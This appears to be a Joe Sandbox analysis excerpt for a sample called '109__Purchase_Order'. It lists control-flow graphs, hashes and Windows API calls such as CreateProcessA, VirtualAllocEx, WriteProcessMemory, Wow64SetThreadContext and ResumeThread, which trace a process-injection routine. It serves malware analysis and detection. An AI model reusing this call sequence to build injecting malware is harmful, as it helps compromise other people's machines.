                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 7d30357d43c1212376d53e1698eb8e4e4f300cc72b6cbdca206d77b537fa021a
                                                                                        • Instruction ID: e4aa61ca2a368f6fd20763d0638bd6ec94ecd9c3d9b1418a68aaa931da6bce54
                                                                                        • Opcode Fuzzy Hash: 7d30357d43c1212376d53e1698eb8e4e4f300cc72b6cbdca206d77b537fa021a
                                                                                        • Instruction Fuzzy Hash: E7A17F71D00219CFDB60CFA8C940BEDBBB2BF48354F1481A9EA48A7255DB749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 445 2ff01d8-2ff026d 447 2ff026f-2ff0279 445->447 448 2ff02a6-2ff02c6 445->448 447->448 449 2ff027b-2ff027d 447->449 453 2ff02ff-2ff032e 448->453 454 2ff02c8-2ff02d2 448->454 451 2ff027f-2ff0289 449->451 452 2ff02a0-2ff02a3 449->452 455 2ff028d-2ff029c 451->455 456 2ff028b 451->456 452->448 464 2ff0367-2ff0421 CreateProcessA 453->464 465 2ff0330-2ff033a 453->465 454->453 457 2ff02d4-2ff02d6 454->457 455->455 458 2ff029e 455->458 456->455 459 2ff02f9-2ff02fc 457->459 460 2ff02d8-2ff02e2 457->460 458->452 459->453 462 2ff02e6-2ff02f5 460->462 463 2ff02e4 460->463 462->462 466 2ff02f7 462->466 463->462 476 2ff042a-2ff04b0 464->476 477 2ff0423-2ff0429 464->477 465->464 467 2ff033c-2ff033e 465->467 466->459 469 2ff0361-2ff0364 467->469 470 2ff0340-2ff034a 467->470 469->464 471 2ff034e-2ff035d 470->471 472 2ff034c 470->472 471->471 473 2ff035f 471->473 472->471 473->469 487 2ff04b2-2ff04b6 476->487 488 2ff04c0-2ff04c4 476->488 477->476 487->488 491 2ff04b8 487->491 489 2ff04c6-2ff04ca 488->489 490 2ff04d4-2ff04d8 488->490 489->490 492 2ff04cc 489->492 493 2ff04da-2ff04de 490->493 494 2ff04e8-2ff04ec 490->494 491->488 492->490 493->494 495 2ff04e0 493->495 496 2ff04fe-2ff0505 494->496 497 2ff04ee-2ff04f4 494->497 495->494 498 2ff051c 496->498 499 2ff0507-2ff0516 496->499 497->496 500 2ff051d 498->500 499->498 500->500
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02FF040E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 75efc55d981bd560fab966e65dc18a15c02088bf7423613828f3143c6b853e46
                                                                                        • Instruction ID: 714244a578a5af9bba0d9ead740c94eb66948b6f62e5cd3602bf03bb3ab1a9ff
                                                                                        • Opcode Fuzzy Hash: 75efc55d981bd560fab966e65dc18a15c02088bf7423613828f3143c6b853e46
                                                                                        • Instruction Fuzzy Hash: 6E917E71D00219CFDB60CFA8CD40BEEBBB2BF48354F1481A9EA48A7255DB749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 502 2f7ae50-2f7ae5f 503 2f7ae61-2f7ae6e call 2f79858 502->503 504 2f7ae8b-2f7ae8f 502->504 509 2f7ae84 503->509 510 2f7ae70 503->510 506 2f7aea3-2f7aee4 504->506 507 2f7ae91-2f7ae9b 504->507 513 2f7aee6-2f7aeee 506->513 514 2f7aef1-2f7aeff 506->514 507->506 509->504 557 2f7ae76 call 2f7b0d9 510->557 558 2f7ae76 call 2f7b0e8 510->558 513->514 515 2f7af23-2f7af25 514->515 516 2f7af01-2f7af06 514->516 521 2f7af28-2f7af2f 515->521 518 2f7af11 516->518 519 2f7af08-2f7af0f call 2f7a834 516->519 517 2f7ae7c-2f7ae7e 517->509 520 2f7afc0-2f7b080 517->520 523 2f7af13-2f7af21 518->523 519->523 552 2f7b082-2f7b085 520->552 553 2f7b088-2f7b0b3 GetModuleHandleW 520->553 524 2f7af31-2f7af39 521->524 525 2f7af3c-2f7af43 521->525 523->521 524->525 527 2f7af45-2f7af4d 525->527 528 2f7af50-2f7af59 call 2f7a844 525->528 527->528 533 2f7af66-2f7af6b 528->533 534 2f7af5b-2f7af63 528->534 535 2f7af6d-2f7af74 533->535 536 2f7af89-2f7af8d 533->536 534->533 535->536 538 2f7af76-2f7af86 call 2f7a854 call 2f7a864 535->538 541 2f7af93-2f7af96 536->541 538->536 543 2f7afb9-2f7afbf 541->543 544 2f7af98-2f7afb6 541->544 544->543 552->553 554 2f7b0b5-2f7b0bb 553->554 555 2f7b0bc-2f7b0d0 553->555 554->555 557->517 558->517
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7B0A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: f58ca51334dbf2217bdde9af8e866a76baadf969bb42fe1db45445145981cd0d
                                                                                        • Instruction ID: a9a7885d172154a4be2ee776dd6d5f99bd48c47e4e321c80a7fa512ee1af5c69
                                                                                        • Opcode Fuzzy Hash: f58ca51334dbf2217bdde9af8e866a76baadf969bb42fe1db45445145981cd0d
                                                                                        • Instruction Fuzzy Hash: 6F7145B0A00B058FD724DF2AD54079ABBF1FF88344F00892ED58AD7A50DB35E949CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 670 2f7449c-2f759e9 CreateActCtxA 673 2f759f2-2f75a4c 670->673 674 2f759eb-2f759f1 670->674 681 2f75a4e-2f75a51 673->681 682 2f75a5b-2f75a5f 673->682 674->673 681->682 683 2f75a61-2f75a6d 682->683 684 2f75a70-2f75aa0 682->684 683->684 688 2f75a52-2f75a5a 684->688 689 2f75aa2-2f75b24 684->689 688->682
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02F759D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 538fa5f9f6a3f2f98a34127a2ce0236ec7e68751e67493063f521a38bef77577
                                                                                        • Instruction ID: 55451c1a9cc877cf48593e1c9216dfe728ad44c32feecf1718653bd70593b3a5
                                                                                        • Opcode Fuzzy Hash: 538fa5f9f6a3f2f98a34127a2ce0236ec7e68751e67493063f521a38bef77577
                                                                                        • Instruction Fuzzy Hash: 6041F2B0D00729CBDB24CFA9C884BCEBBF5BF49304F60806AD508AB255DB755949CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 691 2f7591c-2f75923 692 2f7592c-2f759e9 CreateActCtxA 691->692 694 2f759f2-2f75a4c 692->694 695 2f759eb-2f759f1 692->695 702 2f75a4e-2f75a51 694->702 703 2f75a5b-2f75a5f 694->703 695->694 702->703 704 2f75a61-2f75a6d 703->704 705 2f75a70-2f75aa0 703->705 704->705 709 2f75a52-2f75a5a 705->709 710 2f75aa2-2f75b24 705->710 709->703
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02F759D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 4e28f4a88118b9ae5fd7109276544e0171d21095a597f20a95a878308e81debb
                                                                                        • Instruction ID: 602819a779d189b995acdbc276bb98f5cbf940d0034da40a2e670cdb2d7a462f
                                                                                        • Opcode Fuzzy Hash: 4e28f4a88118b9ae5fd7109276544e0171d21095a597f20a95a878308e81debb
                                                                                        • Instruction Fuzzy Hash: 5A4104B0D00729CFDB24CFA9C9847DEBBB5BF49304F24806AD418AB265DB755949CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 712 2ff0007-2ff00cd ReadProcessMemory 715 2ff00cf-2ff00d5 712->715 716 2ff00d6-2ff0106 712->716 715->716
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02FF00C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 3fc81b5e15038f06191dc8ca07eed5692f5860eb9259868a1db7561ab3e9a34d
                                                                                        • Instruction ID: 465dba4cd0c1520c4236c40e2e76bfb7ba80d97cc9256a0166a554493a957a67
                                                                                        • Opcode Fuzzy Hash: 3fc81b5e15038f06191dc8ca07eed5692f5860eb9259868a1db7561ab3e9a34d
                                                                                        • Instruction Fuzzy Hash: 24319E719053899FCB11CFA9C844ADEBFF0FF4A314F1884AAD588AB262C7385845CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 720 2f7a878-2f7a880 722 2f7a882-2f7b308 720->722 723 2f7a8ac-2f7a8e0 720->723 727 2f7b310-2f7b33f LoadLibraryExW 722->727 728 2f7b30a-2f7b30d 722->728 729 2f7b341-2f7b347 727->729 730 2f7b348-2f7b365 727->730 728->727 729->730
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B121,00000800,00000000,00000000), ref: 02F7B332
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: d38e92343b02259c64dd1b2d73a503174cc44593b8b3cddb15d1286f73a3a540
                                                                                        • Instruction ID: f1e0d6ad9ddf3a78bbae2bf651992368f7a05198d62f7f7250b3fb6c9f58f97e
                                                                                        • Opcode Fuzzy Hash: d38e92343b02259c64dd1b2d73a503174cc44593b8b3cddb15d1286f73a3a540
                                                                                        • Instruction Fuzzy Hash: 9631DDB68043988FDB11DFA9C854ADEBFF4EF5A314F0580AAC554AB212C3349549CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 733 2f7feaf-2f7fefe 736 2f7ff00-2f7ff0c 733->736 737 2f7ff0e-2f7ff4d WriteProcessMemory 733->737 736->737 739 2f7ff56-2f7ff86 737->739 740 2f7ff4f-2f7ff55 737->740 740->739
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02F7FF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: f625d329331f8d11f3eeef7be0a6572b0dcc3dd52bccf60a08231e54a2f076ec
                                                                                        • Instruction ID: 06d014203d019405d03ab8503b16be3cdd5abd4d74cebdbf2d0d57cfa1776bff
                                                                                        • Opcode Fuzzy Hash: f625d329331f8d11f3eeef7be0a6572b0dcc3dd52bccf60a08231e54a2f076ec
                                                                                        • Instruction Fuzzy Hash: 812157B1900359DFCB10CFA9C885BEEBBF4FF48314F10842AE958A7250C7789944CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 744 2f7feb0-2f7fefe 746 2f7ff00-2f7ff0c 744->746 747 2f7ff0e-2f7ff4d WriteProcessMemory 744->747 746->747 749 2f7ff56-2f7ff86 747->749 750 2f7ff4f-2f7ff55 747->750 750->749
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02F7FF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 36520a7b9562b2589fb565b46c35c9f81533a16c362c1ece2b316ec2875064c1
                                                                                        • Instruction ID: 438eeff2001b5b9e9847864c05bf67288e176c84846a2b7d6ae40196a6dce4f8
                                                                                        • Opcode Fuzzy Hash: 36520a7b9562b2589fb565b46c35c9f81533a16c362c1ece2b316ec2875064c1
                                                                                        • Instruction Fuzzy Hash: A82155B1900359DFCB10CFA9C884BEEBBF4FF48324F10842AE958A7250C7789944CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 754 2f7c9c0-2f7d3b4 DuplicateHandle 756 2f7d3b6-2f7d3bc 754->756 757 2f7d3bd-2f7d3da 754->757 756->757
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F7D2E6,?,?,?,?,?), ref: 02F7D3A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 882e1c4ff7b857a9ecdd5f9630e794adca07a9fefb1cb182f39f481da8c73c9d
                                                                                        • Instruction ID: bc7f493778fb271176c3dc7f5549b736a21eb452214f96711863b521ba68216f
                                                                                        • Opcode Fuzzy Hash: 882e1c4ff7b857a9ecdd5f9630e794adca07a9fefb1cb182f39f481da8c73c9d
                                                                                        • Instruction Fuzzy Hash: 722103B59002489FDB10CF9AD984ADEBBF4EB48314F54805AE918A7310D374A954CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 760 2f7d319-2f7d3b4 DuplicateHandle 761 2f7d3b6-2f7d3bc 760->761 762 2f7d3bd-2f7d3da 760->762 761->762
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F7D2E6,?,?,?,?,?), ref: 02F7D3A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: d4a3918f05ad0246b073b57ac22ffe433972e6c7bd8a10297fa16223b200e0e1
                                                                                        • Instruction ID: 92a79ff0681d330910e9f8826fd18246a8f8ec35f8bef94eedae5c087cb368ee
                                                                                        • Opcode Fuzzy Hash: d4a3918f05ad0246b073b57ac22ffe433972e6c7bd8a10297fa16223b200e0e1
                                                                                        • Instruction Fuzzy Hash: 5B2112B5D002599FDB10CFAAD984AEEBBF4FB48314F14802AE958A3310C338A954CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02FF00C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 17970a53891a8fc32af22ebf09607605a1691ccf7a3fa0d92fd7eb8b777a1ddb
                                                                                        • Instruction ID: 4823beddc812c17a57018eb606744ef21dd1ea1aa64ad44337e2c67ec5dc400a
                                                                                        • Opcode Fuzzy Hash: 17970a53891a8fc32af22ebf09607605a1691ccf7a3fa0d92fd7eb8b777a1ddb
                                                                                        • Instruction Fuzzy Hash: B72128B1D003599FCB10DFAAC944ADEBBF5FF48320F108429E559A7251D7749544CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05BAF5FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 8a8c17f6bff7491e7af312164a27ddacacebb2e03d0e677c2c4cbe566443a063
                                                                                        • Instruction ID: 03d7a47c5bb4214b5959403bcd092e99dc5b23ff93ac1452db8678b2c9501461
                                                                                        • Opcode Fuzzy Hash: 8a8c17f6bff7491e7af312164a27ddacacebb2e03d0e677c2c4cbe566443a063
                                                                                        • Instruction Fuzzy Hash: 112149729043099FDB10DFAAC4857EEBBF4FF88324F10842AD459A7250CB78A944CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05BAF5FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: f64f00df9795cdef281d7149af043499e0af1d6c7ab3c459614e98aeeb6dbbbf
                                                                                        • Instruction ID: 5b1aa71d65f8cb0e3c8cf43c6c15f81708366ac5a54c80431be75e79b86d0712
                                                                                        • Opcode Fuzzy Hash: f64f00df9795cdef281d7149af043499e0af1d6c7ab3c459614e98aeeb6dbbbf
                                                                                        • Instruction Fuzzy Hash: 322168769043088FDB10CFAAC4857EEBBF4EF88324F10842AD459A7251C778A985CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05BAFF36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 4920135356e2ba58b1a4211b3d2aedacad0e00f10cdf8eef575c0ab47981c62d
                                                                                        • Instruction ID: eda3c6e4eee613187219521011e32f3e3d3990ef065bdf8ef4e42c810ef6dfbb
                                                                                        • Opcode Fuzzy Hash: 4920135356e2ba58b1a4211b3d2aedacad0e00f10cdf8eef575c0ab47981c62d
                                                                                        • Instruction Fuzzy Hash: 7D21CD728043888FCB20CFA9C445BEFBFF5EF48320F20845AE555A7251C735A554CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B121,00000800,00000000,00000000), ref: 02F7B332
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 86d5488f800344f39522a7409ca21ec6e7473da553ddcaf4b566acc422eb720f
                                                                                        • Instruction ID: db03183f0fe6fff708b085075c258cf484fce49cea0beb208f751ffd02043a8a
                                                                                        • Opcode Fuzzy Hash: 86d5488f800344f39522a7409ca21ec6e7473da553ddcaf4b566acc422eb720f
                                                                                        • Instruction Fuzzy Hash: 6F1126B6D003488FDB10CF9AC448ADEFBF4EB49314F10846ED519AB210C375A545CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 0ef3732ab416199c375a917e538874402b04747ad0fa40fb961f0a75525d9a83
                                                                                        • Instruction ID: 68c0a6d94485d0696cd8abaefc419a4d8ed0a93e857188a9769be83a5e364e22
                                                                                        • Opcode Fuzzy Hash: 0ef3732ab416199c375a917e538874402b04747ad0fa40fb961f0a75525d9a83
                                                                                        • Instruction Fuzzy Hash: 171176B29043488FCB20DFAAC4457EEFFF4EB88324F208469C459A7240CA35A545CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B121,00000800,00000000,00000000), ref: 02F7B332
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 48649049a86cb4201d7d99963708d07d82df5c00bb93502580b9e17b619d0ec3
                                                                                        • Instruction ID: 0d0114185f23a1428ea42c70cf8083966cd7ed6f5c30c8075822c77dbd94b996
                                                                                        • Opcode Fuzzy Hash: 48649049a86cb4201d7d99963708d07d82df5c00bb93502580b9e17b619d0ec3
                                                                                        • Instruction Fuzzy Hash: 681123B6D003488FDB14CF9AC944ADFFBF4EB48314F10846AE919A7210C375A685CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05BAFF36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 1a15ceac9008185ba861d531f4c9556a46984aa086924b2da450ea06a98d44ce
                                                                                        • Instruction ID: ff1eb3348dddaefac5364c520d37d763570d080a2529a3c4fde43cb7db1ab072
                                                                                        • Opcode Fuzzy Hash: 1a15ceac9008185ba861d531f4c9556a46984aa086924b2da450ea06a98d44ce
                                                                                        • Instruction Fuzzy Hash: 3C1137769042499FCB10DFAAC844BEFBFF5EF48324F108419E559A7250C775A554CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 02FF243D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1689409918.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2ff0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 3be6a70ec8ce0977626f6842377ded5b704c6a6e20089a4260c7df2e9a503b52
                                                                                        • Instruction ID: ec30a1b6b8b45f30702ec4f0791b3416d808932e4615dcf19f49d88007149736
                                                                                        • Opcode Fuzzy Hash: 3be6a70ec8ce0977626f6842377ded5b704c6a6e20089a4260c7df2e9a503b52
                                                                                        • Instruction Fuzzy Hash: 531146B58003589FDB10CF99C585BDEBFF8EB48324F20845ADA54A7250C3B5A944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1693018669.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ba0000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: c042f0a39e77b0b6d3a4fe3ca4d598aa11dd3bd8aff4fc08a300dacbfa2e2c44
                                                                                        • Instruction ID: 3240066dd1feb959f76bfb444792824dae8e0ce6bafb9a76484505a2785ad284
                                                                                        • Opcode Fuzzy Hash: c042f0a39e77b0b6d3a4fe3ca4d598aa11dd3bd8aff4fc08a300dacbfa2e2c44
                                                                                        • Instruction Fuzzy Hash: B9113AB2D043488FCB24DFAAC4457EEFBF5EB88324F208469D559A7250C775A544CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7B0A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1688909354.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2f70000_109__Purchase_Order.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
